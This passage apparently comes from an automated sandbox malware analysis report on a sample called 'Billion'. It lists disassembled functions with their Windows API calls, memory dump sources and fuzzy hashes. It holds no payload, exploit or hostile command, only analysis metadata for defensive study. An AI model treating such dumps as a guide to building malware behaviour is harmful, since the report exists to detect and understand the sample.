                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(00190354), ref: 0019019D
                                                                                                                                                                                                                                                                                                          • VariantCopy.OLEAUT32(00190354,00000000), ref: 001901A1
                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001901AB
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d3061f742e5c687f746483e2aa25ecab36ca23fe98fc4b585afb320c86270e26
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0f9cebdb882204940687ee1bcd3e85eb31223916ac83b9e1bdee2cbcf99f4060
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3061f742e5c687f746483e2aa25ecab36ca23fe98fc4b585afb320c86270e26
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D510835600310EECF2AAF649889B29B3A5EF5D350F258457F906DF296DB70DC44CB92
                                                                                                                                                                                                                                                                                                          Function 001A9B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001341EA: _wcslen.LIBCMT ref: 001341EF
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
                                                                                                                                                                                                                                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 001A9F2A
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A9F4B
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A9F72
                                                                                                                                                                                                                                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 001A9FCA
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                                                          • String ID: X
                                                                                                                                                                                                                                                                                                          • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                                                          • Opcode ID: dbd4719a89033a32e38491af2e262f37c6e45a4404df2c2147a6414c2e7a5b65
                                                                                                                                                                                                                                                                                                          • Instruction ID: 09ba45625e5511cc6a6aec94b321ef9923dd9c731aaa76c76f0e5dc2220e9b6f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbd4719a89033a32e38491af2e262f37c6e45a4404df2c2147a6414c2e7a5b65
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80E1B235608340DFC724EF24C881B6ABBE1BF95314F04896DF8999B2A2DB31DD45CB92
                                                                                                                                                                                                                                                                                                          Function 001A6ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A6F21
                                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 001A707E
                                                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(001D0CC4,00000000,00000001,001D0B34,?), ref: 001A7095
                                                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 001A7319
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: .lnk
                                                                                                                                                                                                                                                                                                          • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3cb20f0dc753a1c3bf089c0d51f0ad3c08fbc07a9b8b26d50a15ec0f9848b16c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 56aab2942a21548f34d17cdbc9facf0623e7322d2141be7e9d04536d8da5f942
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cb20f0dc753a1c3bf089c0d51f0ad3c08fbc07a9b8b26d50a15ec0f9848b16c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9D13A71508301AFD304EF24C881E6BB7E8FF99708F40496DF5958B2A2DB71EA45CB92
                                                                                                                                                                                                                                                                                                          Function 001A1196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 001A11B3
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 001A11EE
                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 001A120A
                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 001A1283
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001A129A
                                                                                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 001A12C8
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9b037fdf91ff088e49a60ce18790e5393adc364b80adca4dde732bcc86eb27f7
                                                                                                                                                                                                                                                                                                          • Instruction ID: 682edf49083c63fc06aff201b3abf4b21fa0b202f3c99a9abbe548b2a24cee97
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b037fdf91ff088e49a60ce18790e5393adc364b80adca4dde732bcc86eb27f7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC416D75900204EFDF05AFA4DCC5AAAB7B8FF09310F1440A5ED009E296D730DE55DBA0
                                                                                                                                                                                                                                                                                                          Function 001C8C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0018FBEF,00000000,?,?,00000000,?,001739E2,00000004,00000000,00000000), ref: 001C8CA7
                                                                                                                                                                                                                                                                                                          • EnableWindow.USER32(?,00000000), ref: 001C8CCD
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 001C8D2C
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000004), ref: 001C8D40
                                                                                                                                                                                                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 001C8D66
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 001C8D8A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5efee64d9d6022de44c418b69e2ef9852112a6e4a140ecb78264ba89734259b4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1425efdc745b77cf332ccdbe35077c94b0f71506b03ed5e514a4193dfed0b3ef
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5efee64d9d6022de44c418b69e2ef9852112a6e4a140ecb78264ba89734259b4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB417130601248EFDB25DF64E8CDFA57BE1FB65308F1540AEE5194B2A2CB31E849CB55
                                                                                                                                                                                                                                                                                                          Function 001B2D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32(?,?,00000000), ref: 001B2D45
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001AEF33: GetWindowRect.USER32(?,?), ref: 001AEF4B
                                                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 001B2D6F
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 001B2D76
                                                                                                                                                                                                                                                                                                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 001B2DB2
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 001B2DDE
                                                                                                                                                                                                                                                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001B2E3C
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7a37c10dc86426ab3248167fd5aa2efedc7d4170ecdf7a433aebb643d900db04
                                                                                                                                                                                                                                                                                                          • Instruction ID: 756a8ac4f10e242c638b8569b580827507e2c828689ebb59cdfc0a2d4e833479
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a37c10dc86426ab3248167fd5aa2efedc7d4170ecdf7a433aebb643d900db04
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B431DC72505315ABC720DF54D849F9BBBA9FB88354F00092AF899A7181DB70E949CB92
                                                                                                                                                                                                                                                                                                          Function 001955E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 001955F9
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00195616
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0019564E
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019566C
                                                                                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00195674
                                                                                                                                                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 0019567E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5c76d91af76c063d4162f4cf9295c03f2d26b02f350e17a19c2d72433d5b557f
                                                                                                                                                                                                                                                                                                          • Instruction ID: ecee5a12b15837f10d50051a88f6921d578be27cb7b6bddd4f261b9115c576d7
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c76d91af76c063d4162f4cf9295c03f2d26b02f350e17a19c2d72433d5b557f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C221D172204600BBEF165B69AC49E7B7BAADF89760F148039F805EA091EB71DD819760
                                                                                                                                                                                                                                                                                                          Function 001A6263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00135851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001355D1,?,?,00174B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00135871
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A62C0
                                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 001A63DA
                                                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(001D0CC4,00000000,00000001,001D0B34,?), ref: 001A63F3
                                                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 001A6411
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: .lnk
                                                                                                                                                                                                                                                                                                          • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                                          • Opcode ID: dc31aeef6894d43783cda01717842fda129516b4683bd0f62998319466240052
                                                                                                                                                                                                                                                                                                          • Instruction ID: bfde2e55d950a0c8529e777f06e6dff62bcf85006c1e432ec55965ab498758fa
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc31aeef6894d43783cda01717842fda129516b4683bd0f62998319466240052
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78D13379A043019FCB14DF25C484A2ABBF5FF9A714F198859F8899B361CB31EC45CB92
                                                                                                                                                                                                                                                                                                          Function 001536F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,001536E9,00153355), ref: 00153700
                                                                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0015370E
                                                                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00153727
                                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,001536E9,00153355), ref: 00153779
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c3c43b5710881acd020cc949f0dd72044b80543c074606baa46c549126997d77
                                                                                                                                                                                                                                                                                                          • Instruction ID: 69324a844a02968d11a4124a2c80e6c439669587bd5687031bcee04705c69d20
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3c43b5710881acd020cc949f0dd72044b80543c074606baa46c549126997d77
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F70128F2909711EEA62527B4BCC657A3A95EB197F77200229F8308F0F0EF114D4AA144
                                                                                                                                                                                                                                                                                                          Function 001630E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00154D53,00000000,?,?,001568E2,?,?,00000000), ref: 001630EB
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016311E
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00163146
                                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000), ref: 00163153
                                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000), ref: 0016315F
                                                                                                                                                                                                                                                                                                          • _abort.LIBCMT ref: 00163165
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: cd5c8e90ba57b8f45e13dc2f5fef61f4e9ea7a3a728cce2e165aa1ba2368cc9d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 544b8bd2f4cb746249f1fac0d5d32423aad0c82ea054c712d9d1c9c993c680ff
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd5c8e90ba57b8f45e13dc2f5fef61f4e9ea7a3a728cce2e165aa1ba2368cc9d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDF0FCB6504A0127C2123739BC0AE6E166AAFE3771B270424F934D22D1EF34CE729161
                                                                                                                                                                                                                                                                                                          Function 001C9480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00131F87
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131F2D: SelectObject.GDI32(?,00000000), ref: 00131F96
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131F2D: BeginPath.GDI32(?), ref: 00131FAD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131F2D: SelectObject.GDI32(?,00000000), ref: 00131FD6
                                                                                                                                                                                                                                                                                                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 001C94AA
                                                                                                                                                                                                                                                                                                          • LineTo.GDI32(?,00000003,00000000), ref: 001C94BE
                                                                                                                                                                                                                                                                                                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 001C94CC
                                                                                                                                                                                                                                                                                                          • LineTo.GDI32(?,00000000,00000003), ref: 001C94DC
                                                                                                                                                                                                                                                                                                          • EndPath.GDI32(?), ref: 001C94EC
                                                                                                                                                                                                                                                                                                          • StrokePath.GDI32(?), ref: 001C94FC
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
